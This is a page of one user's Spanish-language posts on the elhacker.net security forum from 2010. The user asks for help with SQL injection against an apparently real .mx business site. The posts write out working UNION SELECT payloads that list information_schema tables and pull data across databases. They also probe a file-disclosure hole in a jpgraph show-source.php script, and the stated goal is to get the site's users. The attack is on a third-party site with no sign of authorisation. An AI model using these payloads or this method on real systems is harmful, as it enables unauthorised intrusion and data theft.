elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 [2] 3
11  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 2 Septiembre 2010, 04:49 am
of course my friend... te mando el link por correo???
12  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 2 Septiembre 2010, 04:02 am
select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema=0xDBenHex-- jajaja es mas facil encontrar un convertidor de text to hex =P deja lo intento

edito:and 1=0 union all select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from information_schema.tables where table_schema=0x6D78--


si me da las tablas pero al momento de quere extraer los datos de la tabla "pedidos" por ese metodo me da el tipico error:

"Table 'suc.pedidos' doesn't exist"

=S
13  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 1 Septiembre 2010, 23:44 pm
jajaja perdon malentendi xD sip si consigue los datos... edito:aparte a lo que me referia era a intentar consultar la DB "mx" haciendo la consulta "union all select 1,2,3,group_concat(columna),5 from mx.tabla" para ver si resultaban los datos pero nada xD
14  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 1 Septiembre 2010, 22:24 pm
asi es... es lo que se me hace extraño porque intente hacer la consulta:

from mx.tabla--

para ver si me agarraba la consulta y nada y con la tool si me a impreso las columnas... :S
15  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 1 Septiembre 2010, 21:09 pm
jajaja se me da explicar mal las cosas xD bn creo que puede ser eso que tu mencionas sobre los privilegios sobre la db pero insisto porque el programa si logro extraer los datos??? :S
16  Seguridad Informática / Nivel Web / Re: Consulta a una db en: 1 Septiembre 2010, 19:05 pm
Primero que nada Phamtom muchas gracias por responder pero quiero aclarar que si se hacer SQLi muy bn  :rolleyes: jajaja la modestia :D la cuestion es esta pongo la inyeccion asi:

http://www.xxxx.mx/xxxx_suc/impresion.php?id=xxx+and+1=0+union+all+select+1,group_concat(columnas),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+tablas--

y me da este error:

Table 'suc.tablas' doesn't exist

yo se que existe la otra DB llamada mx donde estan las tablas que yo quiero xD pero la cuestion es que cuando pongo algun query de tablas que no sean pertenecientes a la DB "suc" me da el error... osea que si puedo cosultar las tablas de la DB "suc" pero al momento de pedir que me muestre las tablas me imprime tanto con el group_concat como con el limit todas las tablas de las DB's osea que si puedo hacer query's a la DB "mx" la cuestion es que no se porque con la tool (por cierto quiero aclarar que solo la utilizo en casos criticos xD) si puede imprimir el contenido de las otras tablas y columnas :S



Gracias Phamtom

edito para demostrar que si se SQLi aqui estan las pruebas xD:

http://wannahack.forums-free.com/sql-injection-style-pilotcast-d-t33.html


un tuto hecho por mi xD
17  Seguridad Informática / Nivel Web / Consulta a una db en: 1 Septiembre 2010, 00:51 am
pues bien vengo de nuevo molestando...  :D jajaja lo que me ocurre haora esque tengo una web con SQLi pero cuando intento hacer la consulta me da el error

"Table 'suc.tlb_pedido' doesn't exist"

la cosa es que cuando consulto que columnas tiene la tabla tbl.pedido si existe... :( otra cosa es que existe otra DB llamada "mx" y utlizando una herramienta para testear SQLi me dice que la tabla que intento acceder por el navegador es de la DB "mx" haora mi pregunta es:¿tengo que especificar de cual DB agarre la tabla? y si es asi ¿cual es la sintaxis correcta de la inyeccion? osea donde va hubicada la espcificacion y como... :)


Desde ya muchas gracias
18  Seguridad Informática / Nivel Web / Re: Sql injection con filtro. en: 5 Junio 2010, 04:02 am
Mmm bien de lfi sabes mas tu que yo xD jajaja creo que voy a tener que creerte  ;D a menos que alguien opine lo contrario...  :o


Gracias por todas sus respuestas las aprecio mucho.
19  Seguridad Informática / Nivel Web / Re: Sql injection con filtro. en: 5 Junio 2010, 03:53 am
Pues yo puedo abrir cualquier archivo que este en la carpeta osea puedo cargar el code de todos inlcuso hay uno que se llama: show-image.php y *que se llama al archivo*(me equiboque aqui xD) asi:

show-image.php?target=cualquier-archivo-de-la-carpeta.php

incluso puedo llamarlo asi:

show-image.php?target=/var/www/sistema/libs/jpgraph/php5/src/Examples/show-source.php

y me lo carga pero archivos que esten en carpetas anteriores no los abre... :D


Desde ya gracias.
20  Seguridad Informática / Nivel Web / Re: Sql injection con filtro. en: 5 Junio 2010, 01:18 am
Sa... se un poco de php pero no es lo suficiente :-( yo se que no debo de andar preguntando de echo busca cuantas preguntas e hecho... =P pero bueno buscare mas sobre lfi aunque lo que yo queria era un rfi o sqli para tener los usuarios...  :rolleyes:  :D y otra cosa:

https://ejemplo.com/libs/jpgraph/php5/src/Examples/show-source.php?target=https://ejemplo.com/libs/jpgraph/php5/src/Examples/show-source.php

si me carga el code!!! el code es el siguiente:


<?php highlight_file(basename(urldecode($_GET['target']))); ?>


:D jajaja gracias por todo   :)
Páginas: 1 [2] 3
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines